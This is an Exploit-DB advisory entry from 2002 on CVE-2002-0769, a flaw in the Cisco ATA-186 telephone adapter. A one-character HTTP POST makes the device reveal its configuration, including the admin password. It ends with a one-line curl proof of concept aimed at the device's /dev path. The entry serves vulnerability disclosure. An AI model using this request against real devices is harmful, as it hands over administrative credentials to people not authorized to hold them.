Cisco ATA-186 HTTP Device Configuration Disclosure Vulnerability

2002-05-09T00:00:00
ID EDB-ID:21441
Type exploitdb
Reporter Patrick Michael Kane
Modified 2002-05-09T00:00:00

Description

Cisco ATA-186 HTTP Device Configuration Disclosure Vulnerability. CVE-2002-0769. Remote exploit for hardware platform

                                        
                                            source: http://www.securityfocus.com/bid/4711/info

The Cisco ATA-186 Analog Telephone Adapter is a hardware device designed to interface between analog telephones and Voice over IP (VoIP). It includes support for web based configuration.

Reportedly, HTTP requests consisting of a single character will cause the device to disclose sensitive configuration information, including the password to the administrative web interface.

curl -d a http://ata186.example.com/dev